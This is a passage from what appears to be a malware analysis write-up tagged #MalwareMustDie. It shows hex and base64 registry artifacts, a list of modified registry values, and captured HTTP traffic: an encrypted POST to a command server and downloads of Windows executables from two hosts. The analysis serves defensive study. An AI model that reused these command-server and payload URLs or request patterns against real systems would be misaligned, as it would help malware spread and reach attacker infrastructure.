AC 84 7F 61 A1 7C 84 C5 67 7E 84 D9 57 02 F2 53 32 DA 75 4C 31 EB 76 A5 D3 27 18 58 60 8E 56 7E 71 C6 58 4E B0 34 AF 15 C6 B2 06 3E D8 63 D8 FB 65 65 47 BC 31 97 EC BC CD 20 BF DB 20 49 7A AD 58 E8 7C 77 C0 56 4C 79 B6 1D F3 13 09 91 B8 D0 30 3F 3B B0 81 D1 5C 1C 96 D4 A4 A9 9F 43 DC 0B C5 1A 08 37 96 66 78 62 33 CA 89 C9 4D 1D 55 50 CD 6E B0 38 51 EE F3 9E A9 7C 7A 22 1E C9 55 AE 5C 77 86 5B 93 F6 57 41 F9 14 5E A4 E4 B5 87 0C FD 52 99 AF 06 3B 35 4F 3F 52 ED B6 5A E3 48 C2 A7 5B 63 A6 21 33 3D 32 D4 8F 2F D2 24 3E 74 79 1E D9 E0 60 40 59 26 99 21 0E FD 55 69 82 D3 0E 93 52 33 0A A5 F0 8E BD 17 29 B9 8D C8 E1 A6 63 CB D3 64 AC 61 42 50 A6 CB CC 88 C7 67 C0 C0 D6 41 98 47 00 BF CD 93 29 ED 67 3F F1 B2 4F 0E EA 8E A6 84 C2 5F B5 2E DC 36 C4 8A FF 81 E3 60 C3 96 A2 7B 6C 98 69 3B DD E2 46 73 2F 3C F5 8A 2F 32 D2 63 24 3E 6F F0 7A D3 2F B3 22 1F 65 88 50 78 A1 C9 B0 46 B6 
E2 20 46 87 0F 3B A3 DD 0A AA 6B C9 ED EE 71 B5 E7 F6 21 E8 F2 5C 8F FC C4 9A AB 8D 25 A5 C3 00 75 B5 BC FC 19 0E F0 29 BE A5 D0 DE 87 D1 09 24 A6 04 ED 1E 29 17 00 19 14 3C 2F F6 B3 FF 71 FE 1B 76 90 07 44 C2 8A EA F5 31 60 D4 A8 86 E2 95 C4 C3 EA 06 DA 5C C2 42 50 EA 4A 03 0D E8 D9 42 2A 26 C7 40 D7 F5 A0 CC 24 BE E2 64 16 80 71 D8 27 41 6A 30 6D EE 7E 8C DC A2 7A 05 A0 94 E1 EE 83 BE 0A 23 DB 81 FA 0C E8 F8 0A 30 34 19 15 06 D7 79 77 72 A8 0A CD 24 93 74 94 0F 74 A2 0F 5A C9 C7 00 8C 51 FD ED E8 FC 49 89 BC 6B 0D B8 0F 5D CE 9E BB FA 63 FE 36 29 E5 4F 1D 31 6D 85 67 44 02 06 CB FC 1D A5 AC 15 AB BC 86 6B A3 54 99 A2 27 3D 29 42 99 71 DC 3B 06 5F 64 32 1F 1C 24 BD AD 7A 0C 80 C9 7C AE 19 29 08 45 05 C8 35 6D CA AC B1 BC 02 94 38 D7 FD 95 F3 11 0B 78 63 BA F4 89 39 56 4D 47 23 C4 44 1A 7A C7 54 75 8E 0F 5F 61 4A 86 65 17 8C B4 6D 18 5B D3 19 5F CF E1 2A FE 27 DD 98 13 94 9F CD C4 9B 7B AA FB 43 48 1C F2 BD 05 C2 BB EF F1 40 9F 61 4E D9 E7 D8 AF DF CE F7 03 B7 BC DD 24 CD 30 92 9F EE 3A 36 37 2D F5 54 EC DA CC 2D 21 1E 9C 00 64 A9 A0 F6 6C 10 78 A6 0C 63 E3 48 41 49 82 B8 6B 91 B9 7A 3C 80 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\7ec4g79: 66 44 68 62 6A 49 49 33 4B 54 63 66 74 55 77 41 54 6C 66 46 4F 52 36 52 73 37 6A 58 6C 63 66 5A 45 39 4E 33 56 58 6E 39 6C 7A 77 69 6E 6F 5A 47 79 4D 6A 35 49 62 2B 32 63 4F 30 63 59 51 6A 59 61 6E 36 67 58 56 66 36 33 73 57 76 31 35 48 71 52 34 48 6D 6F 5A 65 75 79 41 2F 53 36 6A 61 4A 4E 63 39 34 44 38 76 53 59 4D 36 73 59 37 52 6C 65 71 74 61 46 54 4B 31 78 6A 71 65 50 55 35 66 54 48 5A 59 70 4F 63 4B 67 79 74 55 6E 43 4E 78 49 76 61 75 4C 51 43 78 6F 37 77 37 69 4F 4D 67 51 2B 55 63 44 41 5A 51 54 73 4D 51 6D 5A 35 6E 64 61 5A 6F 4F 79 7A 7A 77 6A 67 2B 48 71 32 58 58 34 46 42 55 50 63 54 33 62 33 34 68 30 77 39 4C 72 52 32 6D 79 4E 4B 4F 4E 66 36 7A 71 51 69 58 6B 52 73 4F 38 6A 4C 43 4F 43 4D 56 41 48 44 32 49 54 51 36 37 67 6F 4E 62 6B 65 6A 65 67 59 55 57 6B 76 6A 51 41 5A 67 56 6B 7A 32 
68 77 67 4D 4F 63 32 6B 55 52 55 77 6F 74 66 57 49 55 7A 37 2B 2B 75 6F 4F 49 69 51 68 62 63 6C 34 42 31 70 44 63 4D 6B 48 34 57 49 7A 56 6F 37 48 71 69 49 74 46 57 45 59 61 31 58 66 39 43 47 33 39 55 31 71 4A 37 2F 64 74 52 6D 41 2B 66 4F 4A 34 4D 6B 54 72 53 45 6E 62 2F 6E 79 38 75 47 71 42 2F 55 61 75 4F 68 51 33 75 79 77 6F 59 76 38 54 51 76 34 34 67 35 64 53 51 59 34 34 53 47 65 44 4C 4F 32 75 78 75 6D 34 43 55 49 48 46 4A 5A 34 45 71 57 4D 4F 6B 31 32 79 4F 37 39 52 66 4A 6A 76 72 52 76 57 43 35 30 32 49 76 6D 65 2B 49 35 5A 4C 39 33 79 39 51 41 51 5A 79 77 68 4C 50 34 50 6F 64 66 59 68 6F 2B 30 57 68 6D 47 30 37 38 65 62 75 72 52 71 78 43 50 46 31 33 6B 48 47 78 48 66 4B 58 54 72 39 56 4D 6B 39 43 6D 39 66 62 72 4C 39 6D 5A 45 39 31 73 5A 6D 61 75 66 42 44 34 56 2F 45 59 74 31 4E 35 4D 50 74 35 50 62 46 44 56 6D 72 55 58 4D 51 33 68 33 56 75 32 43 59 61 67 4E 66 58 57 52 62 33 50 74 38 4E 75 58 47 6A 2F 69 78 39 73 36 45 73 46 30 32 56 37 4B 53 5A 32 73 67 54 33 75 37 61 2F 6E 56 75 74 4F 79 42 6F 46 39 56 45 69 70 76 6E 39 6F 7A 70 54 67 34 48 76 36 58 46 53 69 77 77 44 6E 79 4B 35 73 6B 4C 65 48 32 6C 70 73 34 72 54 63 4E 70 70 70 76 61 6E 67 7A 70 66 31 66 5A 37 4A 33 72 57 62 4B 56 42 69 67 79 6C 50 34 66 31 75 74 33 4C 64 6A 41 58 49 47 61 72 46 46 56 70 2B 31 46 70 5A 51 2B 67 30 62 45 53 7A 48 2B 52 69 63 65 4A 62 46 72 75 52 43 62 4B 46 32 58 41 79 37 77 4F 34 38 53 73 68 69 48 65 50 4F 4F 75 33 59 64 4D 6E 38 58 32 2F 65 75 72 72 48 68 52 61 4B 4F 31 34 72 75 2B 69 2F 6B 59 45 48 62 65 4F 35 30 58 4F 4E 66 77 6E 53 49 4C 31 66 4D 77 2F 65 55 35 47 2B 59 2B 49 5A 55 62 64 33 62 65 55 39 48 53 6D 66 72 4D 6E 38 65 4C 37 38 77 64 43 63 43 66 5A 45 74 67 53 36 59 67 67 65 58 2F 63 74 5A 5A 45 78 33 68 6D 5A 34 34 5A 4B 6C 71 44 7A 4B 4E 37 77 76 31 6C 36 4B 6F 32 74 66 42 42 30 41 42 66 77 2F 57 58 63 78 35 74 72 46 48 47 5A 63 6E 4D 59 6E 42 6C 52 6D 48 43 75 71 6C 57 31 70 6E 67 41 53 6F 4B 59 73 69 6E 69 59 51 31 6B 46 4D 34 7A 43 54 57 62 50 31 30 
7A 41 52 5A 51 54 42 38 67 68 79 6A 33 45 38 69 61 4B 71 44 42 55 70 62 43 72 44 58 39 66 46 6A 6B 58 68 38 77 65 6B 4D 47 42 72 37 63 77 66 54 55 50 71 64 67 79 34 34 31 4B 4A 48 4F 73 65 71 61 61 5A 59 4A 6D 50 6D 38 2B 43 71 73 6E 55 66 67 72 6F 78 6A 79 6D 50 4B 67 65 77 64 76 43 6B 34 68 45 42 45 51 4F 4A 69 71 53 69 48 44 4A 57 61 62 75 4B 34 42 52 47 67 39 4C 47 39 5A 51 46 44 4F 45 47 49 50 51 5A 51 79 6D 6A 61 76 30 42 77 7A 79 75 42 39 6C 42 4B 77 44 44 4A 37 65 35 78 74 65 66 32 49 65 6A 79 58 49 2F 38 78 4A 71 72 6A 53 57 6C 77 77 42 31 74 62 7A 38 47 59 54 41 56 2B 34 6B 75 6E 59 70 76 44 65 6B 75 58 2B 2B 57 76 67 42 53 47 4B 43 70 72 6D 76 67 72 48 4E 31 57 78 73 6F 51 64 45 77 6F 72 71 39 54 46 67 31 4B 69 47 34 70 58 45 77 2B 6F 47 32 6C 7A 43 51 6C 44 71 53 67 4D 4E 59 2B 6B 38 65 71 59 49 76 47 44 32 55 51 2F 64 49 4D 45 34 57 75 49 6D 64 44 55 6F 74 6E 66 70 4C 64 66 78 4F 47 77 4F 42 61 43 55 34 65 36 44 76 67 6F 6A 32 34 48 36 44 4F 6A 34 43 6A 41 30 47 52 55 47 31 33 6C 33 63 71 69 42 2F 56 76 7A 38 6B 78 64 4C 6B 51 6B 57 33 69 44 66 72 70 51 46 4B 35 67 56 45 33 31 67 4C 4C 35 56 34 43 4B 62 37 31 57 47 31 77 5A 43 69 6E 6C 54 78 30 78 62 59 56 6E 52 41 49 47 79 2F 77 64 70 61 77 56 71 2F 31 38 66 46 44 49 64 4D 77 6F 56 55 56 6E 56 65 69 4D 70 76 48 4D 59 7A 6C 48 44 55 68 73 4C 78 63 38 55 53 75 55 64 30 2F 52 51 35 43 30 30 48 66 39 39 4D 66 43 4D 4F 50 6B 64 37 4E 37 78 5A 62 6E 41 43 58 70 79 7A 4F 52 41 4D 7A 65 30 76 55 6B 52 56 78 4F 65 31 49 79 6C 79 42 6E 74 6F 4A 5A 34 53 59 32 51 77 36 30 4B 38 30 46 77 37 68 31 30 42 59 65 4E 4A 45 64 7A 2B 4B 30 34 79 59 36 77 6E 36 6B 54 77 77 55 67 5A 45 2F 71 41 51 49 4B 4C 45 4F 31 45 71 74 54 74 64 42 58 58 77 72 4D 79 2F 75 64 75 59 63 30 6E 68 66 62 42 63 64 2B 36 6F 6D 41 30 76 33 79 76 4E 68 54 45 6E 4E 77 32 73 70 77 52 2B 59 4F 34 76 48 48 54 66 5A 54 63 50 33 59 6B 33 42 73 2B 57 76 77 67 37 4F 54 63 4C 62 6C 68 6F 47 38 46 53 75 4E 36 75 77 54 56 41 33 63 35 4C 6E 4E 48 66 55 31 
4E 4D 44 39 59 4F 74 76 79 6C 39 59 6F 33 72 4F 69 4B 55 44 49 2B 35 43 2B 61 70 30 69 4D 73 37 56 59 50 76 52 2B 54 50 30 2B 55 5A 77 74 70 33 6E 5A 76 38 6F 50 47 62 42 52 45 45 39 4C 7A 6F 57 56 5A 44 7A 42 71 63 6C 7A 31 37 65 48 66 54 4B 50 46 71 53 57 59 35 54 42 33 32 72 2B 2B 2B 34 65 4B 79 30 6A 66 6D 68 44 6C 64 4F 2F 38 56 48 46 6E 6F 34 77 78 33 2F 4D 2F 4D 79 37 33 64 6F 2B 2F 55 71 79 2F 4C 4A 5A 75 62 75 4A 44 62 36 36 62 72 51 32 53 43 4E 50 52 62 4F 67 39 6B 37 6A 61 67 56 49 78 57 58 31 31 75 53 48 58 6F 51 61 6A 63 75 4B 48 58 33 69 74 2F 77 5A 33 6B 4E 50 36 6C 4A 38 78 67 30 62 76 6F 50 59 32 33 39 41 54 63 57 37 49 53 64 4F 45 4C 2B 4D 49 41 6B 44 63 61 49 76 4E 50 45 4C 45 42 72 77 37 72 4C 79 57 4D 4F 41 73 4F 44 30 2B 72 4F 73 6E 6B 30 54 4A 30 6E 59 50 41 4D 45 69 31 57 47 52 33 4F 4A 35 56 55 51 30 73 51 73 48 62 38 4A 69 31 76 66 6F 34 31 34 44 66 63 4B 65 6E 6D 66 68 76 33 73 79 7A 76 2B 57 59 2B 2F 70 6D 37 52 49 49 71 72 47 65 4A 43 42 67 45 4F 6B 32 31 38 4E 2B 76 37 63 45 4E 71 53 56 2F 4B 4C 52 35 66 33 37 56 51 4E 49 61 34 57 49 6D 35 33 2F 6C 59 42 78 71 6D 70 35 76 31 74 46 32 78 30 78 6D 53 46 47 45 33 52 31 77 4A 47 35 36 7A 64 32 41 4B 35 37 68 39 38 65 4C 39 36 33 72 79 4E 6B 52 4B 68 4E 61 30 6B 55 7A 4E 30 45 75 67 41 2B 56 43 55 52 74 2F 6E 4B 36 45 2F 62 51 70 45 2B 4F 6E 66 4D 37 61 2F 47 66 4F 2F 76 65 51 51 4B 78 61 46 30 62 73 69 77 7A 47 6F 78 4B 38 53 50 2F 43 54 56 2F 55 52 61 37 58 2F 42 49 63 43 43 6B 6D 5A 41 6B 4A 38 65 35 50 62 2B 54 55 72 4B 79 68 42 47 56 33 4B 6A 44 41 62 54 42 42 59 63 68 4C 6B 6F 78 30 48 2F 4C 65 38 58 59 34 77 39 73 63 35 68 47 68 67 78 6D 4A 55 74 69 6C 50 57 6D 45 58 74 59 62 57 44 74 42 2B 4B 36 74 45 45 62 35 58 52 30 33 51 38 4E 46 32 50 39 51 52 4E 75 6A 57 44 6F 77 46 43 38 56 2B 57 50 4A 32 68 64 44 57 63 50 58 48 6B 4E 56 4D 6F 78 2F 6E 54 65 41 64 58 44 34 78 45 53 76 55 57 2B 67 59 51 45 4A 77 38 38 42 56 39 55 33 55 71 6F 58 50 41 46 34 37 4A 6D 6E 63 6B 38 49 65 79 64 6D 
65 51 31 48 6C 70 75 45 2F 6C 4D 37 2B 41 44 31 36 78 4D 69 59 46 53 61 48 62 67 4B 5A 48 71 6A 32 67 4A 53 2B 77 67 38 62 4C 56 2B 78 6F 4C 4F 6E 59 38 54 41 41 6C 79 50 6A 4C 7A 77 50 6E 69 67 6B 50 39 75 6B 59 4C 52 43 79 6F 2F 51 45 2F 57 78 31 30 79 47 69 2B 63 52 45 47 49 78 48 73 38 33 57 7A 77 67 76 42 56 68 45 54 43 66 59 61 4A 30 33 45 63 51 73 52 72 67 6F 43 76 47 75 39 51 49 55 57 43 52 59 35 31 6B 6B 6E 65 6F 39 31 5A 45 77 70 4D 36 64 4F 48 50 4C 45 76 54 2F 4A 70 4F 74 68 65 30 62 73 35 47 4D 74 36 49 6D 44 4C 77 31 79 54 75 47 59 53 32 50 64 70 55 4B 61 47 39 55 73 64 68 58 4E 2F 2F 6E 75 49 35 79 6E 73 62 48 4E 4F 50 42 32 7A 41 68 77 6C 36 32 51 51 2F 72 67 49 54 6E 69 74 65 2F 71 63 79 37 6E 34 58 51 46 62 6B 6B 6A 54 7A 66 59 36 52 2B 71 6E 69 49 31 34 66 55 4B 4A 61 77 3D 3D HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1ccc3cfg: 9A A2 3F 43 D5 D4 29 01 0A 77 93 11 1E BD CB F6 47 7D 44 34 F9 57 05 D6 50 A6 04 20 31 A0 C6 83 8F 80 3D 1A 68 60 03 5F 84 3D AC 6C B2 88 18 88 99 2B A0 5D 56 FA DE D5 60 D6 91 F1 63 99 15 7F 5C F2 20 71 D5 02 D6 6E AC 91 73 DC 53 DB 47 F4 B3 CF 90 56 06 13 98 0B 1E BC DF CA 0F B7 06 3A 13 57 8F 81 02 CF D2 65 9B 8D 0E 73 99 06 7A E8 56 FE 55 72 6A F0 3A 4F 71 88 7C AB 6C E6 FF 91 4B 67 52 B1 56 6D AF 13 17 A5 54 4C F6 AB 35 D5 35 F3 91 78 F4 BC 49 8D 2D C0 11 7A 6D D0 DE DF E7 BF 97 6C D7 49 D9 C6 A8 BB BD 34 89 67 09 9E CD 25 1E 58 3F 6B 5B AD 80 F5 01 37 E4 A5 43 59 5A 2A 24 4F 0D BC 9B 5B 82 2F 55 DD AF 89 B1 B4 08 46 53 D3 F7 61 FC 46 9D D0 94 81 C7 EA 48 22 D9 C2 B8 B1 E6 97 E3 89 24 D0 5E CB F6 8F 43 C1 31 24 6D A0 90 59 DF FB 70 F3 A1 5C 78 73 B9 00 93 5B A0 87 1F 34 3F 13 A6 71 8A DF 32 3A D5 D0 28 92 83 34 2D FE B6 FD AD 62 81 C6 E6 DE B8 FE A6 ED BC 9C AB AA 27 57 90 60 14 A9 5E 56 32 82 43 2B 15 7A 80 3F 25 C8 DF 42 83 EF 35 03 7D 93 FA DC CD B7 A7 AF 0E A3 F3 1B 40 DA 3F 3F 73 F3 92 F6 F4 0C 13 94 47 BB 82 08 D7 D2 BD 81 4F 09 AF 1E 67 61 3A 06 1E B8 C0 22 8E 4B 07 08 C3 D0 99 
A3 9A A0 15 BE 12 49 BC 8A 2A DB 37 A2 DA BE 17 34 9D 14 70 CD 91 22 3D 72 4B 04 3C B6 FC 5D D3 B0 D0 CD 52 A8 1C F6 EC E0 F3 E5 3C D2 08 06 BA 67 D3 0F 76 6A BB DF 55 77 AC 0C A5 B1 12 7E AC EA C1 4F 91 A4 D8 D8 33 6C EE C6 6D 8B 42 25 F2 8C 81 29 44 B5 8E D8 C5 53 E1 09 74 77 06 E8 91 25 34 B5 43 ED A3 2D 76 1E 02 A8 39 F3 1F 8C AB F2 B3 EA B1 6F 6B 21 83 DC 58 9E F5 75 D2 2B 91 DA 48 5C 36 B6 B0 43 6A 4B A7 5B EA E5 D3 2D 54 AF 2F 45 48 44 C7 34 0D FE FA 51 F3 46 F6 A4 AF 0D 1B 11 2C C7 CD EB 8D EC 27 2F 58 60 8E CA DD 7A 97 DF A3 E0 3A 71 EC DC F1 93 87 CC 2B 42 4B 37 37 D6 9E 08 A1 2B 8B E5 56 67 93 69 2B 20 6C 4A 81 8E 04 04 CC 9B BF C7 ED DF 8B 33 A9 0C 8E 21 75 A1 67 FE D0 5C 1C 96 D5 A4 A9 DF D2 DC 0B C5 AF 08 37 96 6C 89 DF 72 AB 7E EC 51 10 9D 21 4B 0D 4D 16 C5 21 0A B0 00 2F 23 3D 49 76 47 3B 62 22 47 B9 68 46 5C 8F 1E 8F 94 BB D5 73 31 F8 B7 70 94 56 BC 15 38 B0 45 3A BE 48 10 F5 11 DF 4C 9A ED 39 F0 56 31 47 88 91 6C CA 10 D7 6B DF 8D F6 3D 7C 26 B2 27 67 DB 3D 97 4F D1 68 CC EF A0 C7 4D B0 A1 67 3D 22 72 BD 3B 22 FB 13 E2 F5 F9 01 73 23 1E 03 17 1B 42 A5 6F C2 C4 12 14 C6 7C FF C8 76 FC E3 A8 C0 F0 AA AB 69 39 8D 3B 93 6B 1F 03 83 46 68 5B 05 5F C4 8B FF 81 A3 BF C3 96 A2 3E 6D 98 69 B4 04 FC 2D 72 88 F3 49 8D D0 06 71 95 95 46 55 8D 97 FA 80 C3 10 56 2D 54 0F

----------------------------------
Values modified:23
----------------------------------
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 90 30 12 62 DD 7F 82 8B 16 05 C8 00 DB B4 6A A5 46 4D 70 E1 BF D3 DF C0 7F 53 19 88 0A 81 8E 16 41 0C 73 6B 8C 8D 74 B2 A2 94 6D 55 8D DC 9D 40 85 6C B0 1F B7 5F A2 35 77 97 7A D6 D7 26 EE 09 C9 06 26 2A 26 AA B5 59 51 09 CF 32 62 5B 0F 61
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 20 96 FE 0B A2 D7 98 9E C7 C0 44 9D 8F 5B 02 79 62 CE 07 0C 38 C7 E1 A7 C3 61 66 55 B8 D2 89 FB 8C AA 14 30 8F C4 BA 33 00 08 05 78 1F 55 8D 14 8F 02 4F 97 D4 75 FF AA CA 99 B1 97 E8 8C 9B 21 79 3E D3 02 C1 54 C3 8C FE 6C 35 6F C0 C8 03 C6
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000015
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x0000002B
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000008
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000C
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000027
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000002A
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000027
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000002A
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000002
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "ab"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "cba"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "ba"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 15 00 00 00 30 58 95 5D 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 19 00 00 00 D0 F5 A2 C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 2F 00 00 00 20 13 9A 5D 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 35 00 00 00 60 65 CB C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 06 00 00 00 B0 96 90 4F 1C AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 07 00 00 00 D0 F5 A2 C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 06 00 00 00 40 E8 BD 4F 1C AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 07 00 00 00 60 65 CB C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 02 00 00 00 01 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 02 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000004
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000006

==============================================
EVIL NETWORK CONNECTIVITIES..............
==============================================

(1)POST /forum/viewtopic.php HTTP/1.0
Host: 108.178.59.34
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 255
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

CRYPTED0.....?E..+..?X.Q...M.....i....fx....F.hp.q.....2.=B
..*..8..EA`....sj[.....O...2.#Ic.4H..BE...s..$.i.,X.....o.U
..5....GCP..7=.Jt.vpq5o.+.....)u(....?.$....`...O...u.n....
...V.....+Y.u .{..}X?V.h..x.....*.5.Gy.(...>)..1....@.B.B..;
=C.f..<.\......B.*

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 17 Oct 2012 04:17:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14-1~dotdeb.0

-----------

(2)GET /Z2U.exe HTTP/1.0
Host: 3073.a.hostable.me
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

HTTP/1.1 200 OK
Date: Wed, 17 Oct 2012 04:13:17 GMT
Server: Apache
Last-Modified: Wed, 17 Oct 2012 04:10:03 GMT
Accept-Ranges: bytes
Content-Length: 407128
Connection: close
Content-Type: application/x-msdownload

MZ......................@..........................................
.....!..L.!This program cannot be run in DOS mode.
$.......PE..L...

----------------------------------------

(3)GET /PNV3Hbi.exe HTTP/1.0
Host: 85.18.21.252
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

HTTP/1.1 200 OK
Date: Wed, 17 Oct 2012 04:09:24 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 17 Oct 2012 04:06:07 GMT
ETag: "242fca-63658-4cc3963d6a094"
Accept-Ranges: bytes
Content-Length: 407128
Connection: close
Content-Type: application/x-msdos-program

MZ......................@...............................................!
This program cannot be run in DOS mode.$.......PE..L....(~P..............
.Z....................@..........................
......................
......................................................................U..
..E..M.....E..U..E..M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E.
.E......E...]....U...E.P.M.Q.U.R.|......]........U..Q.E.."...E.."...E..".

#MalwareMustDie!!!!!!!!!